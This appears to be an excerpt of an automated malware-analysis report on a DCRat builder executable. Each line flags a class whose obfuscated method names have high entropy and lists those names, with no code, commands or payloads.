              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, nUM0x3rkhJ5uxCKcnJJ.csHigh entropy of concatenated method names: 'naAxiodjbJyJRmCcJ6H', 'zg1wnjdZcg30VwvUn5D', 'l3TgmqdQKALkYgFZFum', 'v5kUr0d9neaxkS3TBik', 'fRBOYwFPQ3', 'uBlC25dn1n1CaZ9QmUa', 'qog9J8dYM37TiHAFTdZ', 'qbxuMUdJdlYWrQM9Jee', 'CxNFGHdB0esYdageIAT', 'mt5GRGdK3lDVTaifZib'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, oHajG1kfAgYJUeXXET1.csHigh entropy of concatenated method names: 'l1fRraTj8P', 'DNsRsy2qWw', 'RtrRNqXaiG', 'mOQRnj0loD', 'QK7lEOQ8DZlZ7D5mOhE', 'O7HKoeQoG0fpwgTjTHe', 'oXim4wQTDRY0HlOyOvD', 'g2GEuEQA2LRYC7KpRML', 'gBHkxcQdYrVj3d0iW6J', 'jwHhyjQrTfNAxyFo4cH'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, feCK3kkzDZ70xu9KtFd.csHigh entropy of concatenated method names: 'NCbi5vJ4mV', 'W6fi684QSC', 'M8li0lSxw1', 'kU3YmwJbJqaKp62mZ2E', 'nBfeMsJurQ8BeEtH74A', 'E0AB5UJDKqBsT3wtFSp', 'fFOcF9JtrguTfNa3I2d', 'IVhRB3JRXNCUi07oanp', 'kEevGHJkJi6i6xuTX9a', 'wuZRYBJp6NjxI3QtJvN'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, csvTTBDe7UV0o4HHj3K.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'BuIkTRLHIu', '_3il', 'fGZkSSXVe9', 'R7HkGKwq8W', '_78N', 'z3K'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, EWcsSUr0fAoCVl1wmAU.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'dIFX9wtMi4', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, fsZkwSZXHf0Xv0mVD5.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Oql8cXH7LAmjP98KowS', 'x0ysf1HlKiEJO3deNNI', 'sgROWWHwAaFOCvowtm8', 'eJRxCiHWPDv1PMQwtbd', 'BP8BaCHUtIB0aSV6r41', 'lLX9hnHNHRnYTmMc5kF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, StuS5UFYUNN3WcTAGg.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'yTA5UKOTJSeqoUSRwQE', 'eHxMjoOrKPqpg2kkd6L', 'tHc9doO28bp9WPvCVyu', 'VEBBPTODGQup8f2GYLt', 'DJlw3UOtCTfkjKsJKow', 'Lp4VVeObshiWvOiWerR'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, nvHsMUGWsdX0G3LO0P.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'xFWXvcm3BHRuPbcvti3', 'EySrKOm1UZShrk0XtGy', 'fkySKwmckuH44Vwae3I', 'eA0l3fmGHdmFsvIjgwq', 'ly5HrKm0mcS0wgf9o4m', 'EQOC1Gm7EyT6XpvO3kk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, V8JCbEk9AccBknpBX1p.csHigh entropy of concatenated method names: 'NC1R2LKK6r', 'Ev5RDLyTB9', 'IUkRcLFwVk', 'iIYWErQ0teIJccwt6hR', 'HZeSyKQcemZSfKSpRps', 'CfQRMjQGwhytemtCSGJ', 'gMoHAHQ7qeYYPjFjO1X', 'NVpRytBwSt', 'UMuRU5rvCI', 'NGKR3yjCtM'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, lOkbQbBb0NfPWduKuZ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'EZ6dhlmvqq9GG96Wpx1', 'BpkokymVojm7NBpxKOy', 'lXxDffmzuRgcNbj9RNx', 'ukMTCIO5aeG0kBJVABD', 'nJ2gnUOa0T5M4HAJkLa', 'vZA6XpOmGGO1hi50qml'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, FUvTB8XuAIE6KpJsY4R.csHigh entropy of concatenated method names: 'BefSNVSem8', 'EqlZxaMm0WqmvifengF', 'h4wD2pMOOwjOfoFVotU', 'xkEvejM5OeNjqnfLaRq', 'dsOMUrMaC54hw2fcmQd', 'B0KVKTMfjBhru3mXOUg', 'toA0KiMH56UW8awX31I', 'F8gNrRMIAAYhn86xVQm', 'dQ0SEpqDyt', 'OsoZ6RMP0S8psSloYfk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, jxUFL6rQt3GR0sxiYTL.csHigh entropy of concatenated method names: 'AYGYAKZenm', 'TIrYMOEeIL', 'Ic6Y1EBWiT', 'Y0JYIU8ZsO', 'Fk7Ya2y5cI', 'QKYYtEEuX3', 'gmju8OrCNplKkQgCTf5', 'cYNyvArpAwgWgToirKF', 'l3UnQ0rhEKf7SCqxMhj', 'ejyQhqrgrOeqX9MfHIN'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, gxlrpek1LvGoYoBLo6h.csHigh entropy of concatenated method names: 'sg9', 'bZ1G5YLGSg', 'wyxFtydHyD', 'loOGpZRDcv', 'nI3onRjCVIhSrqcmBqJ', 'lxKnfMjgtJ3wk4d2sA9', 'vmRpWDjSane75GQFNv2', 'goD72QjpvgusU3qTXx3', 'bCDGWKjhelJZKegbbsM', 'Q8VcMEjsb2OHqmcylMp'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, MTJPGvHNe9SAZAXfcK.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'BqK4hu3qM', 'chxPjRmNaj7BlMQxeeX', 'dUeau1mx2OfKUujpr1h', 'fu2u5RmQyOsNtVmO3vg', 'GKq1Skm93xrM2CT7s8G', 'IetaQPmjiuPBlafPsC2'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ikXWGe4UA9BrWQEbsnG.csHigh entropy of concatenated method names: 'ibIjYD8vpq', 'OtvjXth9sU', 'H2CjHNVbiY', 'IVXjuM4e4A', 'LlQj5eh1u3', 'rXMj6IKTlX', 'w6Zj0NrXlp', 'gbbjvrDwDU', 'vfXjjN1TMt', 'jEojdo4Ykv'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uZ0L4x5Hfw6UKScHjWP.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'NZNuXBaZH3', 'HA2uHS0u9T', 'pvcuuJMb7N', 'w75u5DP9pl', 'nNIu6CWViJ', 'Venu04Kcjp', 'YcT0EuurW7Z5pjO8KJy'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, OJZPS1kZg5X8hT0kG6M.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'HgWifOVYc5', 'nOCGsp0COO', 'BPOix6JvR8', 'lJMG2m3Tse', 'I7oIS7Z232TD1L3nwGb', 'sJag91ZDxgTveZvm1pG', 'iLsUSXZThLdkHHdL8E3'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, LM6iZlrc3Q8eNxGK50m.csHigh entropy of concatenated method names: 'zaeYsMFgRk', 'XXiYNJlrvy', 'OOVYnyP0vI', 'CnFWjJroeIf8bjIkBP3', 'VxqMDlrdYr5ps40e2gU', 'DJQqSgr87FwcLA2gA9L', 'CLpJAJrTTN8XV0I95vi', 'Ejnb54rrKpkI2mv2ouM'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, kGWL5KDSskg6lsJK6ms.csHigh entropy of concatenated method names: 'JJwxcrm7uM', 'NarxPLRLSq', 'foNxByZNE2', 'YN0xZP6dTM', 'tACx4fFvJH', 'SpQLNCBV0dSDXRPtxpZ', 'EtRMNrBzyJYM0xbMLc3', 'GM97B5BXRFXYvq4TYwM', 'kuaTtVBviEfWQTexKS3', 'BxsTeyn5pmxKOxrK4Li'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uD1CEWXcCe05jYVwLlt.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'sJbbV2PTd9lw7kmcXcf', 'pBPLgvPrUGolZtICfYL', 'DVq9U9P2tKYY5ZKhqGL', 'HmRXcCPDIF9fQ82lCTW', 'AFpk4bPt90yQ5KG8FqR', 'euIAfJPbAvGwQsuUabc'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, KyOTmgriHr2hnFRE7We.csHigh entropy of concatenated method names: 'dFjYZU8M0l', 'Tw5Y4RX1Ow', 'TeoYVur8xX', 'aOsYopxaj2', 'WgtYr7lEkZ', 'iwBllprKJ0nmGABStXO', 'rcqMYkrn3vV39EsJh57', 'nKtBknrYgMGmwIU9eNB', 'ttOIS9rE4iHEKsn4c9T', 'b51YgCrqaIAXJuX4JCo'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, dshDBGXU7CTxFAQ7LDy.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'UqSAn26hIeiWumHmUBg', 'BDNKpN6CDAdSCDxoYg1', 'GMRXxE6g3mNhaeQ6O7q', 'jEejwo6S03EeFIASZJ7', 'G891ka6sQO3nxf13vOi', 'ikDPLe6ecFxd93MfwVq'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Cgq2kvzosEAKCPyPAH.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'LFElhQIO4TyZseuaabr', 'miirRgIfHHUcSfONAiW', 'OLZXc3IHYj0o99osII6', 'DoS34iIIDGi86AoriD5', 'BqbvoBI4IOulXHJdqV8', 'agPVhEI669AQbmvxnui'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, GDQqU3XvsenXvHLY6L0.csHigh entropy of concatenated method names: 'aKHGSKjCGI', 'U7wGG60rol', 'wIhGbqF00I', 'zE0gIpMsp1GJNWQTfb9', 'BiMaa2MeLSdPFisOULb', 'e72fBJMgULsnDUR036G', 'j4RRIjMSaAExUSybLPk', 'atnSK3ML3rmi08lhx69', 'vDYrMPMiMYCEoAWkroe', 'TirSG3MyetO7RHV5xTH'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, eiKljD5OouuANgNXZMt.csHigh entropy of concatenated method names: 'aEjQAORfXTN5S7yjuEU', 'MRAkIhRHeJB0bdcQhnX', 'oy3HS0RmJWQZcYHAhCd', 'IRFVbuROCN9rK38XY5P', 'HxmuDUeyii', 'WM4', '_499', 'PNOucrvbDy', 'BEVuPw9WKO', 'RaxuBHVbam'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Oerw6JMJ8naxclaQ7Wt.csHigh entropy of concatenated method names: 'k8FKmB5qJt', 'b7NKQb5MGD', 'R3aKJ3u49p', 'CLZK9STSgB', 'JeHKYlx0LP', 'JDt3Cnl5HtuVTTFJLsS', 'Nt9hUulaWQRCiTbuViW', 'xDPHtG7VJd5g7oWRnVp', 'eArFiF7zkTrofasD8aK', 'YHN2EflmYh0IsAbxgid'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, R7jPP7ImnklP4rRFTd.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'hnMETjHItvYbiaLlYDV', 'Ef8hF3H4F0L4wHGGS3I', 'Lg5IKTH6OWLrn6sK4Yn', 'UnywjKHPIlwXys8n2n2', 'YC9strHMmurs6kxuPKq', 'KTx4UJH3hoajiFMSPOt'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, qtGSCFtKy5HjO36b70.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'jLRxEYfRk6ZRYw3EXxC', 'AYt4IEfkMRcw18mGZvW', 'kkNJuLfpWTscvgZhijK', 'SFoNMGfhG4DyAPa2gRj', 'iV3OmafCTqoBwEUJRiw', 'cIdceCfgJMVcjqXkfuC'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, n0pvB6kIpyvFRJXXn7k.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'N2TGuQXamJ', '_168', 'LXqI3CZBabtGkBnCwk4', 'YPKVP9ZngfkKnPydbqO', 'hjXfsDZYW8jMJNdFPwS', 'WuP2RrZK2nhUWUsAQ94', 'we7nvLZE8KgQ4pmsxNZ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, nhfg4RkyLVj5ML4FnpW.csHigh entropy of concatenated method names: 'fcqRqu9D7v', 'rvsRpuw3vT', 'SZlRhMv1ro', 'N6xu3DQpQqC5Fu9HoMU', 'fyQ4fkQhqnyKnhdOqS6', 'kJ5O7pQCaZcSZFZIdoL', 'WSPUenQgYYiWnKZuCV2', 'agDLM2QSLGFPXE5OgAM', 'oFDQHwQsVXci4Xrks1k', 'm6iZ3RQeScPEx0PZVmj'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, YegRPiMFsvSTUy2Ptw0.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'Bj3wDklYlo', 'K0swcRCkRa', 'vCJwPxEkPp', 'yp6wBEStdG', 'hlewZb2Vmj', 'FBqdPmWP5U9iY1SFK3q', 'rKnFN1WMtAsxILn93HF', 'oE2fb4W49ox1DT1U1tq'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Oqp2h45MbLWUyY0jC2l.csHigh entropy of concatenated method names: 'lM7HRQ9ITC', 'PqMHF9mYm1', '_8r1', 'mcPHi6Q2x4', 'ksfHfmPIU4', 'klrHxWFDok', 'fKhHgDyP6K', 'h31qF1tlvDMBBc4qvOb', 'jLZwZftwZ7rqKi6ixfe', 'wZRs8EtWuns3RF0TkEW'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.csHigh entropy of concatenated method names: 'qM7XNkc3Vc', 'WQkXnD5oeA', 'NmtXEvqHXH', 'QkTXqaJcu4', 'Op8XpBcY05', 'RknXh8VrsY', '_838', 'vVb', 'g24', '_9oL'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, KbcJCiXXRFZqdFTya1b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'RWZdmAINqpWL63JJLFN', 'utPoQMIxVWQB5wXh59w', 'ErQMSOIQxIKLGvZqytP', 'lw8HkNI94AilQwJp17Y', 'OHw4kSIjcf2se1itVv4', 'V1dlrEIZ4yLOupYocol'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, DkrhvAkKQqbxVpf8sH6.csHigh entropy of concatenated method names: 'MLBp6VJr2q2FuGVHYUC', 'UcCI1CJ2ZatwrmC8h6l', 'FsUulOJoaTnjWcJTkrt', 'uF8tMdJTDlBnlM7gBa0', 'IWF', 'j72', 'KCli3w53G6', 'HQAi7WIDGG', 'j4z', 'u0fiL2niwR'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, M3xuuMru7yvhEBnL6WJ.csHigh entropy of concatenated method names: 'sY8YEn9dLh', 'oTaYqNthj9', 'vaSYpDBLoI', 'jHy4nqrtsuJLVaGuBmH', 'jium6ir20tb9x0apE3m', 'bY4SLArDMQBHiglT9GZ', 'pVbkbBrbTq3Mq8hwbu7', 'NLY78kruFMhaRra42OC', 'T7HdcwrRQqMreTCeuX8', 'TA7BH7rkrr0sfOKy12Y'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, deeUvwDr1F0DQZu6DkX.csHigh entropy of concatenated method names: 'aYUx3fSue8', 'NSYy5ABUXilRqy94S45', 'Hje8g1BN0Wge0IhikWm', 'FrhEGXBwJWpXigapZue', 'wjTpJHBWVFXucXpkYJA', 'gUlivCSevW', 'vyxijcp6gk', 'jK4idsomhJ', 'dVhi2SbvUv', 'bAbiDeyID4'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, QG5wveM3LgkoM4utFO8.csHigh entropy of concatenated method names: 'THTGXd54g9', 'LlnGH5wW38', 'HFZGuN2Mgo', 'nv9BTD1dgwBKgByOLNj', 'y7fX8h18fEFCBgc8XqO', 'Onv1mq1oBLmQhg26G9W', 'Yrd5wn1TEMkNcyAEmG9', 'E7jAev1ryLaiPvkh729', 'zILvO712iw2MYYQe8uM', 'o7j94J1FOfS3efTjw4g'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ySyEcdMc0cni3Q58xjX.csHigh entropy of concatenated method names: 'od4KtMd6Yi', 'Y2lK8xg4k2', 'jCiKzoD0sQ', 'X16wTqpAsA', 'UwLwSyR5k7', 'oLFwGDe24B', 'reSwbGbcxO', 'MiHwKKbr6M', 'dTxwwj6hoI', 'oH920mliUAsW1ssDfOk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, WHDInNVdHmUBgCtoi3.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'lRiwWhfWeGWb0mDrG9U', 'VbUZWgfUSbQvyaC9Pdv', 'ICG68jfN3L5tep3x9te', 'qe9ecBfxsxNcVLMCxHG', 'g2iXBifQjT1ktviJioY', 'LPXijIf9ZCCgMmrLF6Y'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PNKNrn423aLw7YTXAHt.csHigh entropy of concatenated method names: 'yucBDaMMP3ECX', 'vyn36Op7S1eDK6Fo3vm', 'pnZE9MplapgQxsowx5a', 'jENnnCpwTNPEY3Vp3hK', 'ihRwU9pWoLl7mLENj3c', 'aylK7HpUuVITtLZewJ3', 'ACAK56pGZ4qlfa905XL', 'jYtERip0o4e4prA4nqU', 'SmhZAJpNrGMGPNDmgmS', 'JUVss3pxOBiloqjaAk4'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, AnGUVdD2JESKqb0kjLg.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, vuI9WhDKcr3MwVZ4Abr.csHigh entropy of concatenated method names: 'PJ0yXvkQrk', 'c2xyuTMi4d', 'NrpykOciTD', 'dZNylap7gw', 'KvQyyJeyCO', 'VyfyUegaNa', 'gSMy3CSdEb', 'NAMy7HomTk', 'jUEyLnimSX', 'DHGyCFxrR9'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, GctDFZX41lS9Uo7uuCY.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'Uwr5vTIiWjwcYngGWgJ', 'EUOf6qIyRhpmwSklL7m', 'qtXKpFIXRMHDIQ694xi', 'ywMN29IvZpCnhPQB7UT', 'eHYtqUIV6jXNMrdXFGA', 'CHpih9IzPL6s86wDmCF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, SktYJqkXLPIuQ6Awout.csHigh entropy of concatenated method names: 'RtgW0UJt9s', 'RGpWvSvxAq', 'b3tWjZ0iKr', 'IdLWdrXJSJ', 'U8jTFMUzVvcqdI1HDjd', 'gqIyrTUvLaDLButUU8H', 'Rj60hxUVqjy7YSgvJ9G', 'L0Duk7N5w2id9lXCrtM', 'SGCSJpNaFDhAOPNv3yE', 'bKiUWeNmtNZykJXx0KV'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, mlk1UZXKuLKF5JDXCmf.csHigh entropy of concatenated method names: 'HGHGCC3pnt', 'PMFKAG1IJLMsJP3rFBV', 'DyTFnY148eUATHh7Dhw', 'g9ntY81fRStEYuH89Hk', 'uM31K61H2MmaPPqQadm', 'dgVBDP16hIGdOjUYfM0', '_5q7', 'YZ8', '_6kf', 'G9C'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, iRKR1nXyR9O1jxumahV.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'cHpum34egfeTIb4Sdnd', 'B0ZuOV4LPImaZwJi5Pg', 'GqSZAQ4ignGH9u1iMlC', 'Jc6Cm34yLoeihFSreTE', 'EFfQsp4XpefdbH3GNQd', 'H6FAd54v2U1f0BGelAZ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.csHigh entropy of concatenated method names: 'g7dFy6Ru26', 'lReFUD5c13', 'cyGF3XyeVy', 'e9682U9RXr0kVildrd2', 'fLRWS79bisoSP8SVcBf', 'btb3vu9u3Kp8mbLFUZJ', 'JxUxBY9kYiRotWnW9FZ', 'lH0FeK09an', 'hBkFWPSYgL', 'JrKFRdjvJJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, MsBg6K5RkP1uMJ0tCH3.csHigh entropy of concatenated method names: 'UvL0J4QlU4', '_1kO', '_9v4', '_294', 'fiN09k7ww6', 'euj', 'XqY0YcsQHH', 'IU70XKQPcs', 'o87', 'VDG0HBWOOJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, L7trMlXk084m2iRiuOD.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'BR8JGxIqowvt7Evqt19', 'keGBxsIFCHwBPCI5TN7', 'GSSyCmIAp3nSaWM96iD', 'ycCsxQIdyhWFEUgsE74', 'iZ8ZkAI8MLwxvQmFqlQ', 'zUuFbOIoXb5oGaNA3H6'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, svkKVPMTtQZgVyRGCYB.csHigh entropy of concatenated method names: 'kyJbtL3ClB', 'nx0b8UxLc4', 'A2hty50NULorsvmYhWY', 'H9mMBL0xEHgKSEnn91C', 'Ad1cMr0QfJVKsmbaAGZ', 'gmvSbw09DVsSVLAmhBR', 'Rfq8Lv0jNDScGRXA51l', 'adcMhi0ZY4tiPAm4qck', 'qWWd9F0JOsEahB0IXiB', 'tASqwt0B6pEBFET5id8'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ooLRuLDTQX9YMad3xl6.csHigh entropy of concatenated method names: 'H4jgKJkYAu', 'FHhgwE3xbA', 'HK2geNLcgF', 'nvs919nwtCcbuDT8nsk', 'gxZT8SnWWtulfk6mvda', 'uT6bbsn7Uwg26WXLo5F', 'vhSGs1nlEpxaj5Y1eCs', 'ytCVTinUVrwV5p5iGvR', 'jGRfplnNuYGdd7vWY61', 'Ja6i2inxwKKaSGQ0irC'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tdSiuSDaMjdFhUgObFS.csHigh entropy of concatenated method names: '_7zt', 'CAWgCouuRT', 'FiOgOxJ2Ic', 'hm9gmDRRuk', 'IFTgQATEFT', 'GOqgJBmSRA', 'A2pg9tZUAj', 'sL5A1Tnjpg1I6KAh5in', 'qFLXaQnZwokYb4IMZDT', 'fZUM3JnQMt4eIqbLCE6'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, HXrR7qkDf0Fi44gKRJ1.csHigh entropy of concatenated method names: 'e36WodF6qn', 'BomWrZ1cQ6', 'f7kWsm91HQ', 'hU9WNDvEV5', 'gicWn7kr3a', 'GusWEUwNi6', 'VbERsCNEsbVvwLT3E8l', 'nuXd0tNYMynGG8wqfmK', 'PLdKXUNKU71c8nA26UN', 'FynVwTNqk8oApSdk9IO'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, sUnRYVCiRw8ZadMnWY.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'eesWWSHL2drSBDxLvHx', 'e5ixO3Hif2IyBL8oXHk', 'lkOLIjHyMND9eVFt8kt', 'yWuxy2HXLqTRVwabTl9', 'icySvEHvFnnujmKhkEp', 'TBl8KRHVnv5cYtsyOA8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SjZBBJ5sEtuH684DtpW.csHigh entropy of concatenated method names: 'IA46Babn9r', 'CGjf62RqTUdOAnDWAeJ', 'mi7i8JRFJRjjgBOer4s', 'qjWWjdRKw2L8c98uleN', 'sRVND8REEVZMLcZ5AN1', '_1fi', 'nbt5hL8cDK', '_676', 'IG9', 'mdP'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GZZEGKMLLRQu2sDQVI6.csHigh entropy of concatenated method names: 'dXvKkCwReb', 'pgNKlaDXgI', 'od4gx77JRkEwkIYiSxl', 'IuZisN7BgCVVkhfRnYJ', 'cc5v657jQLLp1BWJJpE', 'ShK5Vq7Zlj9nyhh257i', 'rZ7Eoa7ncoa1UKi9sb1', 'ElUsZO7YAVNsWOK9rTf', 'eZo7tT7K2mE1s6QfHoM', 'o6447F7E2i6FZmUM5PF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, riAopur7oofVq4YBIsv.csHigh entropy of concatenated method names: 'fcvX5IbfyE', 'dPIX62rJPJ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'RwsX0vKd1B', '_5f9', 'A6Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, U6p1FPktFl1cR68DAXN.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'MnuGbGZN2g', 'zFFiKA9VAS', 'CdoGTDWYvq', 'LIB7tKZG67C8qLAqHry', 'PyrMX0Z0rhY2OHO3sci', 'bpRZqkZ7Jt0eZ84UlL5', 'FtK96aZlo04C5lWhAXC', 's5odbAZwnSQGilF4fW1'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SYyIg6MMNfhQnewQRgt.csHigh entropy of concatenated method names: 'ChaGEenalh', 'IGfGqgsEik', 'GOhGpxWWxI', 'lrMGhCwdhd', 'mL6GAQcDvv', 'LXuGM7npwF', 'yBQbU7cW7gb19veHuMy', 'Q9ZjFAcUaZu3FVR8NS7', 'bFcvYDclh6Gd6gqWl03', 'zFVhk0cwixSqsAMBih0'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, hymEolDmJCDvG7pXDtp.csHigh entropy of concatenated method names: 'tSeltxcyPc', 'i9AlDhqPgR', 'CFMlccHFFv', 'lvOlPgEFn2', 'rmBlBYU1F5', 'DSAlZSvLAu', 'TQWl4s3XpV', 'yo1lVo9PqV', 'GcCloWPGvP', 'Nghlrtd830'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, hUcm6qDlM5iRY6t5U0Z.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, C1tlcgkbm50McP14eAR.csHigh entropy of concatenated method names: 'ydARA5iYeC', 'Kb9RMriUZL', 'oh9R1jrJDq', 'dgIRIU0ucH', 'opBRaryXXg', 'sORh249Iey3O5e47ZWF', 'yypsmX942W1Rbx2TpMD', 'flMnAN9fRBiVxDl4rYZ', 'r27pT79HnGWKaWlDLsQ', 'rOurow96L6fan0k31ZP'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CRcZ1XDiyfXWALjR5J3.csHigh entropy of concatenated method names: 'wZZk20uRwD', 'Bi2kDRvQ77', 'LS3kcPYUjS', 'NlZkPsUJxD', 'c8okB4B5sP', 'RjjcaWYNin3kNQ76EbC', 'xRdE4rYWxavD8pE5xhl', 'jgUo1QYUnLPIeTWuND3', 'qSm2jBYxQNuH8KdqAtX', 'Y9TSfkYQX0VKtd7AHiF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, iu9NfPXI5EJAe19Mmf9.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jJuMMx3QthFpeh7OpUV', 'KO5R6v39bTLoqYh5Tgv', 'OwGwHB3jxGX6bfPokwO', 'LXHqtN3ZWI1luEvvpGM', 'GyvG0X3JeAxc3cAZfCu', 'PCfRLs3B0uFF6nfCAhn'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, DT03pUXYIEy4GFhTafP.csHigh entropy of concatenated method names: 'UCsS0lJoXU', 'p0Kolg6WpotpXc8DdEP', 'es9Qp46UQSUr80kfIAa', 'x1xiag6l0LE6lRmCCB6', 'BdF3Fi6wlEVGSDqiguV', 'jAXDsY6NVnZyGW3n77E', 'C2yeEB6x4TTtA2WjQkc', 'ryB5Rq6QJ8diqkmNdec', 'C0xyLY699en6BGrnnVo', 'f28'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, yIhTZoX797Z8Liv5h9K.csHigh entropy of concatenated method names: 'yAyGJjBb8c', 'slXG9ROQqC', 'EqgGYgqMi5', 'dFw2Qe13iEn4Vk5pDy8', 'AHmTU01PYkgFWoBNYEQ', 'VsvjVx1MQm0meWTQ1mW', 'A3avUQ11YvTE0ld3bdt', 'gJjDu41cU0BcFBuYXcM', 'gsueuR1GiU5mPvpWXtX', 'ylY4cn10rtoxmrNmxdP'
